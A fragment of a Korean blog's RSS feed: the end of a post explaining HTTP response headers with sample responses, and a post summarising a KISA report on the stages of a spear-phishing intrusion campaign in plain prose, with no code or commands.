&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Location :&lt;/b&gt; 클라이언트를 리다이렉션할 URL을 나타낸다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Strick-Transport-Security (HSTS) :&lt;/b&gt; HTTPS 연결을 강제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;X-Content-Type-Options :&lt;/b&gt; 브라우저의 MIME 타입 스니핑을 방지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;X-Frame-Options :&lt;/b&gt; 클릭재킹을 방지하기 위해 프레임 내 삽입을 제어&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Security-Policy (CSP) :&lt;/b&gt; 리소스를 제한하여 XSS 공격을 방지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3) 빈줄(CRLF)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;헤더와 본문을 구분하는 빈줄(\r\n)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4) 본문(Body)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;서버가 클라이언트에 반환하는 데이터로, HTML, JSON, XML, 이미지 등 다양한 형식일 수 있다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔ 성공 응답 예시&lt;/b&gt;&lt;/p&gt;
&lt;pre id=&quot;code_1736608146707&quot; class=&quot;html xml&quot; data-ke-language=&quot;html&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;HTTP/1.1 200 OK
Date: Sat, 12 Jan 2025 10:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
Connection: keep-alive
Set-Cookie: sessionId=xyz789; HttpOnly; Path=/; Max-Age=3600

&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html lang=&quot;en&quot;&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;meta charset=&quot;UTF-8&quot;&amp;gt;
    &amp;lt;title&amp;gt;Login Successful&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;h1&amp;gt;Welcome, test!&amp;lt;/h1&amp;gt;
    &amp;lt;p&amp;gt;You have successfully logged in.&amp;lt;/p&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔&amp;nbsp; 리다이렉션 응답 예시&lt;/b&gt;&lt;/p&gt;
&lt;pre id=&quot;code_1736608161699&quot; class=&quot;html xml&quot; data-ke-language=&quot;html&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;HTTP/1.1 301 Moved Permanently
Location: https://www.newdomain.com/newpage
Date: Sat, 12 Jan 2025 10:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: keep-alive&lt;/code&gt;&lt;/pre&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;740&quot; data-origin-height=&quot;466&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/W940k/btsLJKq3XGp/LZCWTs6ihMmze3cN6nfSdK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/W940k/btsLJKq3XGp/LZCWTs6ihMmze3cN6nfSdK/img.png&quot; data-alt=&quot;헤더 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/W940k/btsLJKq3XGp/LZCWTs6ihMmze3cN6nfSdK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FW940k%2FbtsLJKq3XGp%2FLZCWTs6ihMmze3cN6nfSdK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;466&quot; data-origin-width=&quot;740&quot; data-origin-height=&quot;466&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;헤더 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;3. HTTP 특징&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;- 비연결 지향(Connectionless)&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;HTTP요청은 독립적으로 처리되고 이전의 연결 상태를 유지하지 않음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;클라이언트가 서버에 요청을 보내고 서버가 응답을 보내면 그 즉시 연결이 종료.&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;- 비상태성(Stateless)&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;각 요청 간의 상태 정보가 유지되지 않으며, 이전 요청에 대한 정보를 기억하지 않음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  Session, Cookie, JWT 등을 활용하여 상태를 유지할 수 있도록 함.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/654</guid>
      <comments>https://jennana.tistory.com/654#entry654comment</comments>
      <pubDate>Sun, 12 Jan 2025 01:30:23 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] TTPs#2  스피어 피싱으로 정보를 수집하는 공격망 구성 방식 분석</title>
      <link>https://jennana.tistory.com/653</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;TTPs#2&lt;/b&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;스피어&amp;nbsp;피싱으로&amp;nbsp;정보를&amp;nbsp;수집하는&amp;nbsp;공격망&amp;nbsp;구성&amp;nbsp;방식&amp;nbsp;분석&lt;/b&gt;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처 : KISA 보호나라, &lt;a href=&quot;https://boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTPs&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=35471&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTPs&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=35471&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1735923579937&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-description=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-host=&quot;www.boho.or.kr&quot; data-og-source-url=&quot;https://boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTPs&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=35471&quot; data-og-url=&quot;http://boho.or.kr:80&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/6YeNg/hyXWABJDSF/SIN6FsstPQs1LfEuIDFkkK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/WQokl/hyXWoOPhvO/eF5WpCLiaTFh4fHkk5SCy0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/sFGZ0/hyXWoOPhtU/Xtck7LwfVEwE919XKKO4pK/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=861_89_999_241&quot;&gt;&lt;a href=&quot;https://boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTPs&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=35471&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTPs&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=35471&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/6YeNg/hyXWABJDSF/SIN6FsstPQs1LfEuIDFkkK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/WQokl/hyXWoOPhvO/eF5WpCLiaTFh4fHkk5SCy0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/sFGZ0/hyXWoOPhtU/Xtck7LwfVEwE919XKKO4pK/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=861_89_999_241');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boho.or.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;605&quot; data-origin-height=&quot;857&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/daHV3c/btsLDd7KcUZ/AnFYsUhkjMzQP8pXJt1AGK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/daHV3c/btsLDd7KcUZ/AnFYsUhkjMzQP8pXJt1AGK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/daHV3c/btsLDd7KcUZ/AnFYsUhkjMzQP8pXJt1AGK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdaHV3c%2FbtsLDd7KcUZ%2FAnFYsUhkjMzQP8pXJt1AGK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;605&quot; height=&quot;857&quot; data-origin-width=&quot;605&quot; data-origin-height=&quot;857&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;1. 서론&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;2. 개요&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;3. ATT&amp;amp;CK Matrix&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Initial Access : 최초 침투&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Execution : 실행&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Persistence : 지속성 유지&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Privilege Escalation : 권한 상승&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Defense Evasion : 방어 회피&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Credential Access : 계정정보 접근&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Discovery : 탐색&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Collection : 정보 수집&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Lateral Movement : 시스템 내부 이동&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Command and Control : 명령제어&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Exfiltration : 정보 유출&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Impact : 시스템 충격&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;4. 악성코드 상세 분석&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;5. 결론&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;6. Yara rule&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;개요&lt;/blockquote&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;767&quot; data-origin-height=&quot;411&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bcN3sX/btsLEp69E6z/N41k875GKM4ZFeaQGbtTm0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bcN3sX/btsLEp69E6z/N41k875GKM4ZFeaQGbtTm0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bcN3sX/btsLEp69E6z/N41k875GKM4ZFeaQGbtTm0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbcN3sX%2FbtsLEp69E6z%2FN41k875GKM4ZFeaQGbtTm0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;767&quot; height=&quot;411&quot; data-origin-width=&quot;767&quot; data-origin-height=&quot;411&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ⓛ 공격 준비&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;먼저 공격자는 다수 홈페이지를 운영 중인 호스팅 서버를 장악하여 거점으로 활용한다. TTPs#1 보고서에 서술된 바와 같이 취약한 홈페이지를 통해 웹셸을 업로드하고 호스트 시스템의 취약점을 공격하여 권한 상승을 시도한다. 시스템의 관리자 권한을 획득하는데 성공하면 웹 소스코드 변조, 데이터베이스 접근 등의 모든 행위가 가능해진다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;② 공격 대상에게 스피어 피싱 발송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;거점을 확보한 공격자는 공격 대상을 선정한다. 외부에 노출된 메일 주소를 수집하고 공격 대상의 업무와 밀접한 내용으로 메일을 작성한다. 신뢰할 수 있도록 꾸민 메일을 발송하여 악성코드가 담긴 첨부 파일 열람을 유도하거나 취약한 웹 사이트에 접속하도록 유도한다. 그렇기 때문에 IT 관련 실무자보다는 외부인과의 접촉이 많은 인사, 영업 등의 담당자들이 공격에 보다 쉽게 노출된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;③ 최초 침투&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자는 공격 대상을 감염시킬 때 두 가지 방법을 사용한다. 첫번째는 &lt;b&gt;악성 한글 문서 파일을 첨부하는 방법&lt;/b&gt;이고, 두번째는 공격 &lt;b&gt;준비 단계에서 확보한 거점에 취약점 코드를 삽입하고 접속을 유도&lt;/b&gt;하는 방식이다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;768&quot; data-origin-height=&quot;375&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bCioV6/btsLC0ALuZO/HeIp7wU0OP2zg87YBqhLLK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bCioV6/btsLC0ALuZO/HeIp7wU0OP2zg87YBqhLLK/img.png&quot; data-alt=&quot;Spearphishing Attachment : 메일에 악성코드 첨부&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bCioV6/btsLC0ALuZO/HeIp7wU0OP2zg87YBqhLLK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbCioV6%2FbtsLC0ALuZO%2FHeIp7wU0OP2zg87YBqhLLK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;768&quot; height=&quot;375&quot; data-origin-width=&quot;768&quot; data-origin-height=&quot;375&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Spearphishing Attachment : 메일에 악성코드 첨부&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;754&quot; data-origin-height=&quot;360&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cgQ3HB/btsLEfcrKd3/Mo9HKxjwUziNvGnLJXbb9k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cgQ3HB/btsLEfcrKd3/Mo9HKxjwUziNvGnLJXbb9k/img.png&quot; data-alt=&quot;Spearphishing Link : 메일에 악성 사이트 링크 삽입&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cgQ3HB/btsLEfcrKd3/Mo9HKxjwUziNvGnLJXbb9k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcgQ3HB%2FbtsLEfcrKd3%2FMo9HKxjwUziNvGnLJXbb9k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;754&quot; height=&quot;360&quot; data-origin-width=&quot;754&quot; data-origin-height=&quot;360&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Spearphishing Link : 메일에 악성 사이트 링크 삽입&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;755&quot; data-origin-height=&quot;327&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/brsMX9/btsLDoumiAb/jid9EdBa6DkbCxp016xIJ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/brsMX9/btsLDoumiAb/jid9EdBa6DkbCxp016xIJ0/img.png&quot; data-alt=&quot;Drive-by Compromise : 웹 사이트 접속 시 악성코드 감염&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/brsMX9/btsLDoumiAb/jid9EdBa6DkbCxp016xIJ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbrsMX9%2FbtsLDoumiAb%2Fjid9EdBa6DkbCxp016xIJ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;755&quot; height=&quot;327&quot; data-origin-width=&quot;755&quot; data-origin-height=&quot;327&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Drive-by Compromise : 웹 사이트 접속 시 악성코드 감염&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;752&quot; data-origin-height=&quot;485&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bIgX2Y/btsLDmceSSO/T6tBXonJpMl8tWeviP4MVK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bIgX2Y/btsLDmceSSO/T6tBXonJpMl8tWeviP4MVK/img.png&quot; data-alt=&quot;Exploit Public-Facing Application : 공개된 어플리케이션 취약점 악용&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bIgX2Y/btsLDmceSSO/T6tBXonJpMl8tWeviP4MVK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbIgX2Y%2FbtsLDmceSSO%2FT6tBXonJpMl8tWeviP4MVK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;752&quot; height=&quot;485&quot; data-origin-width=&quot;752&quot; data-origin-height=&quot;485&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Exploit Public-Facing Application : 공개된 어플리케이션 취약점 악용&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;④ 시스템 정보 수집&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최초 침트에 성공하게 되면 네트워크 정보, 호스트 이름 등의 기본적인 시스템 정보를 수집한다. 이후 확보된 권한 및 내부 네트워크 구조를 파악하고 추가 악성행위 여부를 결정한다. 공격자는 감염된 시스템에 추가 악성코드 설치와 명령 결과 수집을 보다 원활하게 수행하기 위해 원격에 있는 공격자의 드라이브를 감염 시스템에 연결하기도 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;⑤ 권한 상승&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자는 최초 침투 시 제한된 권한을 가지며 보다 많은 작업을 수행하기 위해 관리자 권한을 필요로 한다. 따라서 &lt;b&gt;권한 상승 취약점을 유발하는 악성코드 또는 도구 등을 이용&lt;/b&gt;한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;⑥ 지속성 확보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최초 침투에 성공하였다 하더라도 감염 기기가 재부팅되거나 예기치 못한 프로세스 충돌 등으로 악성코드가 종료되어 침투 경로를 잃을 수 있다. 이를 방지하기 위해 악성코드가 다시 실행 될 수 있도록 &lt;b&gt;서비스 등록, 시작 프로그램 설정, 작업 스케줄러 등록, 웹셸 삽입&lt;/b&gt; 등의 행위를 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;⑦ 내부 정보 수집&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본격적으로 악성코드를 통해 감염 긱기의 내부 기밀문서, 전체 네트워크 구조, 계정 크리덴셜 정보 등을 수집한다. 이때 공격자는 효율적이고 간편한 정보 수집, 백신 탐지 회피 목적으로 정상 프로그램을 사용하기도 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;⑧ 내부 전파&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기존에 수집한 계정정보를 이용하여 공유된 네트워크에 접속을 시도한다. 이후 중요 정보가 담긴 주요 시스템까지 도달하기 위해 ' ④ 시스템 정보 수집 ~ ⑦ 내부 정보 수집'까지의 과정을 반복 수행한다. 망분리 정책이 적용되어있을 경우 외,내부간의 접점이 되는 시스템(망연계 솔루션, DRM 솔루션 등)을 찾고 해당 시스템의 취약점을 발굴하여 공격을 시도하기도 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;⑨ 흔적 삭제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격에 사용되었던 악성코드와 사용한 도구들은 즉시 삭제하여 흔적을 지운다. 이때 지속성 확보를 위해 설치한 악성코드는 제외한다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/Jh0nh/btsLD2dkxyS/tIgiGZwGpLDIhsJgkTU0D0/TTPs_2_%EC%8A%A4%ED%94%BC%EC%96%B4_%ED%94%BC%EC%8B%B1%EC%9C%BC%EB%A1%9C_%EC%A0%95%EB%B3%B4%EB%A5%BC_%EC%88%98%EC%A7%91%ED%95%98%EB%8A%94_%EA%B3%B5%EA%B2%A9%EB%A7%9D_%EA%B5%AC%EC%84%B1_%EB%B0%A9%EC%8B%9D.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;TTPs_2_스피어_피싱으로_정보를_수집하는_공격망_구성_방식.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;10.06MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
